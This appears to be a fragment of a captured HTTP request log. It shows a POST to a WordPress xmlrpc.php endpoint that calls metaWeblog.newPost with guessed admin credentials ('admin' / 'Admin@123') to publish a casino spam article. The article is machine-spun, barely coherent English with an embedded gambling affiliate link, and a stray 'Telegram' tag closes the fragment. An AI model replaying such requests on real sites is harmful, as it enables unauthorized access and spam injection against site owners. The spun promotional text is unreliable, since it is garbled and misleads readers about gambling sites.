<value><boolean>1<\/boolean><\/value>\r\n<\/data><\/array><\/value><\/param>\r\n<\/params><\/methodCall>","POST \/xmlrpc.php HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/114.0.0.0 Safari\/537.36\ncontent-length:5960\nhost:47.254.126.238\ncontent-type:text\/xml; charset=utf-8\nconnection:Close\n\n<?xml version=\"1.0\"?>\r\n<methodCall>\r\n<methodName>metaWeblog.newPost<\/methodName>\r\n<params>\r\n<param><value><array><data>\r\n  <value><int>0<\/int><\/value>\r\n  <value><string>admin<\/string><\/value>\r\n  <value><string>Admin@123<\/string><\/value>\r\n  <value><struct>\r\n  <member><name>title<\/name><value><![CDATA[An informed Commission inside Casinos on the internet � Quick Withdrawals and you can Fair RTP]]><\/value><\/member>\r\n  <member><name>description<\/name><value><![CDATA[<p>That's what online casinos to your greatest payment possibilities are common throughout the. It's also regarding quality, easy game play, reasonable aspects, and you may rich music-graphics that don't be cheaper. When you are spinning ports on the cellular telephone otherwise going all-inside for the a real time casino poker desk, an informed gambling enterprises generate all mouse click getting advanced. Think about some thing faster? It should be not value your time otherwise put. Discover only the finest online casino on the web to love for every single gaming session.<\/p>\r\n<h2>Ratings of Top Gambling on line Websites<\/h2>\r\n<p>We all require the better incentive casinos online! However, no number of showy adverts is take on sincere reading user reviews. Systems such as for instance are very a crucial equipment to own players looking to distinguish <a href=\"https:\/\/moon-princess-100.gr.com\/\">moon princess 100 πού να παίξεις<\/a> anywhere between legitimate casinos and those which have suspicious reputations. When dozens (otherwise many) away from users report easy payouts, of good use assistance, and you can an enjoyable experience, it is a so good indication you found a good keeper.  not, the contrary is even true. Merely here are some such advice:<\/p>\r\n<p>A user who documented a two-month race more than ID confirmation and hopeless file need. A knowledgeable online casinos having blackjack options do not do particularly tips.<\/p>\r\n<p>A unique associate try troubled of the misleading incentive terminology and you may inconsistency ranging from real funds and bonus enjoy. That is not an informed added bonus on-line casino! Now, examine by using actual confident knowledge:<\/p>\r\n<p>A top roller which undoubtedly liked the help and you will timely cashouts. This is what the big ideal internet casino will be submit.<\/p>\r\n<p>A person who had been first doubtful however, at some point had a soft and you can credible feel. Therefore, what's the takeaway? Area viewpoints issues. They conserves time, currency, and you may outrage. Thus, check review programs to choose merely best paying internet casino systems.<\/p>\r\n<h2>Transparent Bonus Conditions<\/h2>\r\n<p>An informed casino bonus online look unbelievable on the surface, if the conditions and terms try in pretty bad shape, it's fundamentally inadequate. Inside 2025, the big greatest casinos on the internet understand that people is sick of obscure rules, invisible constraints, and you can impossible-to-obvious wagering standards. So, what does �transparent offer� extremely suggest? Why don't we select:<\/p>\r\n<ol>\n<li>Betting criteria is actually demonstrably stated (30x added bonus, 40x put   bonus).<\/li>\n<li>Cashout limitations try fair (maybe not \"winnings $1000, withdraw $50\").<\/li>\n<li>Qualified games are detailed upfront, no guessing and that ports be considered.<\/li>\n<li>Day limitations try sensible (you are not hurried burning as a consequence of $2 hundred when you look at the a day).<\/li>\n<li>The conclusion from extra loans rather than genuine harmony is said certainly.<\/li>\n<\/ol>\r\n<p>Unnecessary players had been burnt from the buried terms that get implemented once you've currently transferred and starred. That is why an educated internet casino bonuses include brush, digestible information. Essentially, close to new promo flag or perhaps in a simple pop-upwards, maybe not buried during the good ten-web page PDF. Thus, the top best casinos on the internet is going to be openly truthful having beginners.<\/p>\r\n<h2>Top 10 Finest Casinos on the internet<\/h2>\r\n<p>Therefore, exactly what online casino is the best? Really, come across quick payment running and you will a good RTP commission. Ideal incentives online casino web sites create effortless. Once your verification is completed, withdrawals are generally canned within 24 hours, perhaps even less. Besides, exactly what are the best web based casinos? Well, individuals with a reasonable RTP (essentially 97% or over). It indicates you're not always to try out during the a severe drawback. Legitimate gambling enterprises focus on authorized online game team exactly who make certain the ports and you will desk games fulfill industry requirements. Therefore, the best online casino payout are reasonable and you can square.<\/p>\r\n<h2>Just what Gambling enterprises should you not have confidence in<\/h2>\r\n<p>Do you want a knowledgeable casinos on the internet, pal? Predicated on actual pages and you will frequent problems released for the credible sites including , the second casinos allow us a credibility to own unreliability. Should it be put-off payouts, inaccessible customer support, or questionable bonus systems, like programs keeps repeatedly place the expectations of players to your sample.<\/p>]]><\/value><\/member>\r\n  <member><name>dateCreated<\/name><value><dateTime.iso8601>20260516T15:41:08<\/dateTime.iso8601><\/value><\/member>\r\n  <member><name>mt_allow_comments<\/name><value><int>0<\/int><\/value><\/member>\r\n  <member><name>mt_allow_pings<\/name><value><int>0<\/int><\/value><\/member>\r\n  <member><name>post_type<\/name><value><string>post<\/string><\/value><\/member>\r\n  <member><name>mt_keywords<\/name><value><string><\/string><\/value><\/member>\r\n  \r\n  <member><name>custom_fields<\/name><value><array><data>\r\n  <value><string><\/string><\/value>\r\n<\/data><\/array><\/value><\/member>\r\n<\/struct><\/value>\r\n  <value><boolean>1<\/boolean><\/value>\r\n<\/data><\/array><\/value><\/param>\r\n<\/params><\/methodCall>"]
@ Telegram